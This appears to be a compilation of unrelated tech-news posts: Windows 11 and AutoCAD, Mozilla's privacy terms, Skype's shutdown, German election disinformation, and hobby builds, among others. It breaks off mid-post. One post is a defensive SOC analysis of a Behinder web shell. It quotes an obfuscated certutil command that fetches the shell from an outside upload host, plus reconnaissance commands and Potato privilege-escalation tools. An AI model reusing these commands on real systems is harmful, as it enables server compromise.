Microsoft ha deciso di mettere i bastoni tra le ruote a chi utilizza AutoCAD 2022. Con l’aggiornamento Windows 11 24H2, alcuni utenti si sono trovati impossibilitati ad avviare il software, costringendo Redmond a intervenire con un blocco di compatibilità. Risultato? Se hai AutoCAD 2022 installato, Windows Update ti negherà l’upgrade.

Il problema: AutoCAD 2022 non si apre più

Dopo l’installazione della versione 24H2 di Windows 11, tutti i rilasci di AutoCAD 2022 risultano inutilizzabili su alcuni dispositivi. Gli utenti hanno segnalato errori al momento dell’avvio dell’applicazione, spingendo Microsoft a confermare il problema con un aggiornamento nella sezione “Windows release health”.

Nessun problema invece per AutoCAD 2023, 2024 e 2025, che funzionano regolarmente e non ostacolano l’aggiornamento a Windows 11 24H2.

Microsoft interviene con un blocco di compatibilità

Per evitare che gli utenti si ritrovino con un AutoCAD inutilizzabile, Microsoft ha introdotto un blocco di compatibilità per i PC con AutoCAD 2022 installato.

Gli amministratori IT possono verificare la presenza di questa limitazione attraverso il “safeguard ID: 56211213” nei report di Windows Update for Business. Gli utenti di Windows Home e Pro, invece, possono controllare manualmente dalle impostazioni di Windows Update.

Non forzare l’aggiornamento!

Microsoft avverte: gli utenti con AutoCAD 2022 non dovrebbero aggiornare manualmente il proprio PC utilizzando il Media Creation Tool o il Windows 11 Installation Assistant, almeno finché il problema non sarà risolto.

Se il tuo sistema è interessato, riceverai il messaggio: “Upgrade to Windows 11 is on its way to your device. There is nothing that requires your attention at the moment.” e un link a ulteriori dettagli sulle misure di sicurezza implementate.

Non solo AutoCAD: altri blocchi in arrivo

Questa non è l’unica incompatibilità che Microsoft sta gestendo. Di recente, ha rimosso un blocco di compatibilità che impediva l’upgrade su alcuni dispositivi ASUS a causa di problemi di blue screen risolti con un aggiornamento del BIOS.

Altri software che hanno costretto Microsoft a intervenire con blocchi simili includono:

• Dirac audio improvement software
• Asphalt 8 (Airborne)
• Webcam integrate
• Easy Anti-Cheat
• Safe Exam Browser

Conclusione

Microsoft e Autodesk stanno probabilmente lavorando a una patch per risolvere il problema. Fino ad allora, se dipendi da AutoCAD 2022, il consiglio è semplice: evita l’aggiornamento a Windows 11 24H2!

Nel frattempo, gli utenti e gli amministratori IT devono prestare molta attenzione a eventuali aggiornamenti o workaround ufficiali. Se hai già aggiornato e ti trovi con un AutoCAD inutilizzabile, potrebbe essere necessario considerare un rollback a una versione precedente di Windows 11.

Questa situazione mette in evidenza ancora una volta quanto sia cruciale testare la compatibilità prima di procedere con aggiornamenti di sistema su macchine che dipendono da software critici per il lavoro. È consigliabile monitorare le comunicazioni ufficiali di Microsoft e Autodesk per ricevere aggiornamenti tempestivi sulla risoluzione del problema. Fino a una soluzione definitiva, la prudenza è d’obbligo per evitare interruzioni nell’operatività quotidiana.

L'articolo Windows 11 24H2: L’upgrade si blocca per gli utenti AutoCAD 2022 proviene da il blog della sicurezza informatica.

Money, status, or even survival – there’s no shortage of incentives for faking results in the scientific community. What can we do to prevent it, or at least make it noticeable? One possible solution is cryptographic signing of measurement results.

Here’s a proof-of-concept from [Clement Heyd] and [Arbion Halili]. They took a ThermoFisher Scientific 7500 Fast PCR (Polymerase Chain Reaction) machine, isolated its daughter-software, and confined it into a pipeline that automatically signs each result with help of a HSM (Hardware Security Module).

A many machines do, this one has to be paired to a PC, running bespoke software. This one’s running Windows XP, at least! The software got shoved into a heavily isolated virtual machine running XP, protected by TEE (Trusted Execution Environment). The software’s output is now piped into a data diode virtual serial port out of the VM, immediately signed with the HSM, and signed data is accessible through a read-only interface. Want to verify the results’ authenticity? Check them against the system’s public key, and you’re golden – in theory.

This design is just a part of the puzzle, given a typical chain of custody for samples in medical research, but it’s a solid start – and it happens to help make the Windows XP setup more resilient, too.

Wondering what PCR testing is good for? Tons of things all over the medical field, for instance, we’ve talked about PCR in a fair bit of detail in this article about COVID-19 testing. We’ve also covered a number of hacker-built PCR and PCR-enabling machines, from deceivingly simple to reasonably complex!

hackaday.com/2025/03/01/making…

Good morning! There's a bonus edition of Digital Politics this week. I'm Mark Scott, and I've spent the last six days assessing what to make of the recent German federal election on Feb 23.

Despite fears of record levels of foreign interference, the outcome was what almost everyone predicated. Already, some are claiming victory in the fight against online disinformation aimed at undermining the country's democratic institutions.

That would be a mistake. Below is a cross-post from my analysis for Tech Policy Press.

Let's get started:

Lessons from Germany's federal election

A week has passed since Germany’s federal election, and many are breathing a sigh of relief.

Friedrich Merz, a 69-year-old center-right politician, will almost certainly become the country’s next Chancellor, though a ruling coalition government — between Merz’s Christian Democrat Union (CDU) and the center-left Social Democratic Party (SDP) — won’t be formed until mid-April, at the earliest.

Alternative for Deutschland (AfD), a far-right party that garnered support from the likes of US Vice President JD Vance and Elon Musk, finished second in the election with just under 21 percent of the national vote. That party had found vocal support with younger, male voters, particularly in the Eastern parts of Germany, and had garnered significant traction across social media — particularly on Musk’s X, formerly known as Twitter.

Yet widespread fears around online election interference, either promoted by foreign countries like Russia or amplified by fringe domestic groups spreading conspiracy theories around alleged voter fraud or Germany’s supposed misguided support for Ukraine, did not materialize.

The result of Germany’s Feb 23 election was as many had predicted. The country’s vote now joins a growing list of national elections — including scores during 2024 in which more than two billion people voted globally — where close scrutiny from regulators, national security officials and outside researchers has discovered that foreign actors’ both overt and clandestine efforts to sway voters’ decisions proved less successful than first imagined.

Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com

Yet the relief now felt in Germany — that the country’s democratic institutions withstood what national officials and outsiders claimed were unprecedented levels of election-related foreign interference — is misplaced.

It fundamentally misunderstands that digital attacks on countries’ electoral processes can not be combatted solely during short election campaign cycles during which heightened attention is aimed at such malign actors. Instead, foreign adversaries and domestic groups that often amplify state-backed online propaganda are in this for the long haul — and their activities should be viewed over years, if not decades.

Why no one should claim 'mission accomplished'

Any claims — in Germany or other democratic countries — that national officials, tech companies and civil society groups were able to thwart digital interference attacks ahead of individual elections represent a false economy. For one, it’s almost impossible to link specific examples of online state-backed propaganda and covert influence campaigns to how voters cast ballots. For another, those online attacks don’t just stop because a country’s election cycle has come to an end.

Even as Merz’s CDU political party began haggling with the center-left SPD over a new coalition government, Russia’s state-backed media continued to sow dissent and division within Germany for its own political gain.

RT Deutschland — a Kremlin-back media organization that, while banned within the European Union, is still widely accessible in Germany — pumped out article after article about how the Feb 23 election was unjust; that the failure to include AfD in the coalition government was anti-democratic; and that Germany’s ongoing support for Ukraine represented unjustified war-mongering.

If promoted by domestic actors, such talking points would be legal under the country’s free speech rules. But they were instead amplified by a foreign state adversary whose Kremlin-backed media outlets have been sanctioned because of “disinformation and information manipulation against the EU and its member states.”

Under long-standing political norms dating back to the aftermath of World War Two, Germany’s mainstream political parties have created a so-called “firewall” in which politicians will not allow groups associated with extremist movements, including the AfD, to join coalition governments.

Vance, the US Vice President, recently criticized such practices in a speech in Munich. “Democracy rests on the sacred principle that the voice of the people matters,” he said. “There’s no room for firewalls.”

It’s not just foreign adversaries that have continued to cast doubt on Germany’s election — even after the outcome was a foregone conclusion.

Across multiple Telegram channels, some of which have hundreds of thousands of followers, domestic influencers have spread false claims about rigged ballots; accusations that Germany should not support Ukraine because of its alleged starting of the war with Russia; and allegations the CDU wants to outlaw the AfD. Those messages have been further amplified, primarily on X, where some have garnered attention from non-German social media users and have been picked up by Russia’s state media.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Again, none of these falsehoods are illegal under German law, and can not be removed by platforms under the EU’s Digital Services Act. But this slow dripping of inaccurate information — often within fringe social media communities where fact-checking does not exist — represents an ongoing threat to national democratic institutions, particularly when those domestic messages are further amplified by foreign adversaries.

Ahead of Germany’s Feb 23 election, the country’s officials held a so-called ‘stress test’ with the likes of Meta, TikTok, and X to war-game potential threats to the national vote. Klaus Müller, head of the national regulator in charge of the exercise, said his agency was “well prepared” to combat election-related problems. The European Commission also published advice for how national regulators should protect national elections.

Such efforts should not be prioritized for when countries hold elections.

In the ongoing whack-a-mole fight between national officials seeking to defend countries’ democratic institutions and foreign adversaries eager to undermine those norms via covert influence campaigns and outright online propaganda, it’s now a 24/7, 365-day battle — one that doesn’t just come to an end when the votes have all been counted.

digitalpolitics.co/newsletter0…

Quando l’Europa smetterà di guardare oltreoceano come se ogni risposta arrivasse da lì? Quando gli europei torneranno a usare la propria testa, senza prendere a modello Stati e leader che hanno già mostrato i loro limiti? È tempo di tagliare il cordone ombelicale, di maturare, di sciogliere dipendenze che ci rendono fragili.

Negli ultimi anni, il pensiero americano ha dimostrato di essere malato, intrappolato in una spirale di estremismi, conflitti interni e illusioni di grandezza. Eppure, nonostante i segnali d’allarme, c’è ancora chi in Europa guarda a certi movimenti con ammirazione, senza comprendere il pericolo. Il fenomeno MAGA, con la sua retorica aggressiva e la sua nostalgia per un passato idealizzato, non è solo un problema americano: è una minaccia che rischia di contaminare anche noi.

L’Europa non può permettersi di importare modelli fallimentari, di lasciarsi trascinare in guerre culturali che non le appartengono, di diventare un’eco di una società che fatica a tenersi in piedi. Dobbiamo difendere il nostro spazio politico e culturale, riaffermare i nostri valori, costruire una visione autonoma del futuro. Il mondo non ha bisogno di copie sbiadite dell’America: ha bisogno di un’Europa forte, consapevole, indipendente.

Nerf blasters typically fire small foam darts or little foam balls. [Michael Pick] wanted to build something altogether more devastating. To that end, he created a rocket launcher with an advanced air burst capability, intended to take out enemies behind cover.

Unlike Nerf’s own rocket launchers, this build doesn’t just launch a bigger foam dart. Instead, it launches an advanced smart projectile that releases lots of smaller foam submunitions at a set distance after firing.

The rocket launcher itself is assembled out of off-the-shelf pipe and 3D printed components. An Arduino Uno runs the show, hooked up to a Bluetooth module and a laser rangefinder. The rangefinder determines the distance to the target, and the Bluetooth module then communicates this to the rocket projectile itself so it knows when to release its foamy payload after launch. Releasing the submunitions is achieved with a small microservo in the projectile which opens a pair of doors in flight, scattering foam on anyone below. The rockets are actually fired via strong elastic bands, with an electronic servo-controlled firing mechanism.

We’ve featured some great Nerf builds over the years, like this rocket-blasting robot.

youtube.com/embed/umT7IicqUl4?…

hackaday.com/2025/03/01/buildi…

Mozilla ha modificato la sua politica sulla privacy, rimuovendo la promessa di non vendere mai i dati personali degli utenti di Firefox.

Il fatto

In precedenza nelle FAQ dell’azienda era la seguente : “No. Non l’abbiamo mai fatto e non lo faremo mai. E ti proteggiamo da molti degli inserzionisti che lo fanno. I prodotti Firefox sono progettati per proteggere la tua privacy. È una promessa.”

Ora questa è una dichiarazione scomparsa e la nuova sezione sulla privacy afferma che Mozilla non fa più promesse così ampie. L’azienda spiega questo fatto con il fatto che in alcune giurisdizioni il termine “vendita di dati” viene interpretato in modo troppo ampio.

Mozilla afferma che non vende i dati nel modo più usuale del termine ma è costretta a condividere alcune informazioni con i partner. L’azienda afferma che tali dati vengono resi anonimi, aggregati o elaborati tramite tecnologie che migliorano la privacy.

Gli utenti reagiscono: “Questo è inaccettabile”

A seguito dell’aggiornamento dei termini di servizio, gli utenti hanno espresso la loro insoddisfazione nelle discussioni su Guida in linea E Reddit . Erano particolarmente preoccupati per il punto, secondo cui Inserendo le proprie informazioni in Firefox, gli utenti concedono automaticamente all’azienda una licenza gratuita e mondiale per il loro utilizzo.

Mozilla sotto pressione da parte dei critici ha poi corretto la formulazione : i termini ora chiariscono che la licenza è richiesta solo per il funzionamento del browser e non conferisce all’azienda la proprietà dei contenuti dell’utente. Tuttavia, molti utenti sono rimasti insoddisfatti. Uno di loro notato : “Non si tratta di una questione di formulazione. Non possiamo pretendere dagli utenti diritti così ampi sui loro dati.”

Inoltre, Mozilla riconosce di condividere le parole chiave delle query di ricerca con i partner, compresi i dati sulla posizione, ma assicura che lo fa in forma anonima. L’azienda sottolinea che gli utenti possono disattivare questa funzione nelle impostazioni di Firefox.

Molti però non hanno creduto alle spiegazioni dell’azienda. Un utente ha risposto al commento di Mozilla: “Questa è una totale assurdità e lo sai. La funzionalità di base di un browser è caricare e visualizzare le pagine web.”

L'articolo Mozilla Ci Ripensa: Ora Può Vendere i Tuoi Dati Personali? proviene da il blog della sicurezza informatica.

Il mese scorso il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti di sospendere ogni pianificazione di operazioni contro la Russia, compresi gli attacchi informatici offensivi. Lo hanno riferito tre fonti a conoscenza della situazione.

Hegseth ha trasmesso l’ordine al capo del Cyber ​​Command, il generale Timothy Ho, che a sua volta lo ha trasmesso al direttore delle operazioni uscente, il maggiore generale dei Marines Ryan Heritage. Secondo le fonti , la decisione non riguarda la National Security Agency (NSA), di cui Ho è anche a capo, e il suo lavoro di intelligence sui segnali contro la Russia.
Generale Timothy D. Ho
La mossa rientra negli sforzi della Casa Bianca per normalizzare i rapporti con Mosca, dopo che gli Stati Uniti e i loro alleati hanno cercato di isolare il Cremlino a causa del conflitto con l’Ucraina. La scorsa settimana Trump ha incontrato Zelensky a Washington per firmare un accordo che garantirebbe agli Stati Uniti l’accesso alle risorse minerarie ucraine. Tuttavia, l’accordo fallì dopo un’accesa discussione nello Studio Ovale.

La durata dell’ordine di Hegseth rimane sconosciuta, ma il Cyber ​​Command è stato informato che le restrizioni rimarranno in vigore a tempo indeterminato. Heritage, conoscendo tutte le operazioni di comando, deve ora comunicare l’ordine alle unità appropriate, tra cui alla 16th Air Force Cyber ​​Command, responsabile delle operazioni digitali nell’area del Comando Europeo degli Stati Uniti.

Il Cyber ​​Command sta attualmente preparando un rapporto di valutazione dei rischi per Hegseth, che dovrebbe includere un elenco delle operazioni annullate e delle potenziali minacce provenienti dalla Russia.

Se le restrizioni si applicassero solo alle unità impegnate in operazioni informatiche contro Mosca, sarebbero colpite centinaia di specialisti della Cyber ​​National Mission Force e della Cyber ​​Mission Force. Tuttavia, se colpissero anche le unità di intelligence e gli analisti, allora ne risentirebbero migliaia di dipendenti, compresi gli specialisti della NSA.

L’ordine di Hegseth coincide con gli sforzi del Cyber ​​Command per intensificare gli sforzi contro i cartelli della droga messicani, otto dei quali sono stati recentemente designati dall’amministrazione Trump come organizzazioni terroristiche.

Alti funzionari della Casa Bianca chiedono un’azione militare aggressiva contro i cartelli per frenare il flusso di droga negli Stati Uniti.

L'articolo Stop Attacchi Informatici Contro la Russia! L’US Cyber Command è Stato Bloccato proviene da il blog della sicurezza informatica.

Nel mondo della tecnologia, pochi nomi evocano tanta nostalgia quanto Skype. Eppure, dopo due decenni di onorato servizio, Microsoft ha deciso di spegnere per sempre la piattaforma che ha rivoluzionato la comunicazione digitale nei primi anni 2000. A partire da maggio, Skype “non sarà più disponibile”, ha confermato l’azienda su X, invitando gli utenti a migrare su Microsoft Teams, il suo servizio di comunicazione in continua espansione.

Dall’innovazione alla dimenticanza

Skype è stato un pioniere, un software capace di abbattere i costi delle chiamate internazionali e di connettere il mondo con una semplicità fino ad allora inimmaginabile. Nato in Estonia nel 2003, il servizio si diffuse rapidamente, tanto da attirare l’attenzione di eBay, che lo acquistò nel 2005 per 2,6 miliardi di dollari. Tuttavia, il matrimonio tra l’e-commerce e la telefonia VoIP non funzionò, e nel 2009 eBay vendette la sua quota di maggioranza a un consorzio di investitori per 1,9 miliardi di dollari.

Nel 2011, Microsoft entrò in scena con un’acquisizione mastodontica: 8,5 miliardi di dollari in contanti per portare Skype nella propria scuderia. Una mossa che, all’epoca, sembrava destinata a consolidare la posizione di Redmond nel settore delle comunicazioni. Tuttavia, col passare degli anni, il marchio Skype ha iniziato a perdere appeal.

Cosa succederà agli utenti Skype?

Per chi ancora utilizza Skype, Microsoft ha previsto un periodo di transizione fino a maggio 2025. Gli utenti potranno trasferire contatti, cronologia chat e crediti direttamente su Teams, utilizzando le stesse credenziali. Inoltre, fino alla chiusura definitiva, Skype e Teams continueranno a essere interoperabili, permettendo agli utenti di comunicare tra loro indipendentemente dalla piattaforma scelta.

Chi non desidera passare a Teams potrà invece scaricare ed esportare la propria cronologia delle chat prima della chiusura. Per quanto riguarda gli abbonamenti a Skype e il credito telefonico, Microsoft garantirà il trasferimento su Teams, in modo da non penalizzare gli utenti che ancora utilizzano il servizio per chiamate internazionali.

Un declino annunciato

Nonostante un temporaneo rilancio durante la pandemia, quando videoconferenze e chiamate online divennero la norma, Skype ha dovuto affrontare una concorrenza spietata. Zoom, Google Meet, WebEx, Apple FaceTime e WhatsApp hanno gradualmente eroso il suo dominio, offrendo alternative più moderne e integrate con i rispettivi ecosistemi. Nel frattempo, Microsoft ha concentrato sempre più risorse su Teams, integrandolo con Microsoft 365 e puntando sul mercato aziendale.

La chiusura di Skype rappresenta la fine di un’era, ma anche una lezione importante: nel mondo della tecnologia, l’innovazione è una corsa senza fine, e persino i giganti possono finire nel dimenticatoio se non riescono ad adattarsi ai cambiamenti del mercato.

Per chi ha utilizzato Skype nei suoi anni d’oro, il suo addio segna un momento di nostalgia. Ma per Microsoft, questo è solo un altro passo verso un futuro in cui Teams è destinato a dominare il settore delle comunicazioni digitali.

L'articolo Skype Addio Per Sempre! Microsoft chiude il pioniere delle videocall dopo 20 anni di servizio proviene da il blog della sicurezza informatica.

Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…

hackaday.com/2025/02/28/phytor…

Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]

hackaday.com/2025/02/28/buildi…

Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset

It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath

To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat

Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants

By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture

Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise

Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\

securelist.com/soc-files-web-s…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…

If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]

hackaday.com/2025/02/28/cheap-…

Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.

This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.

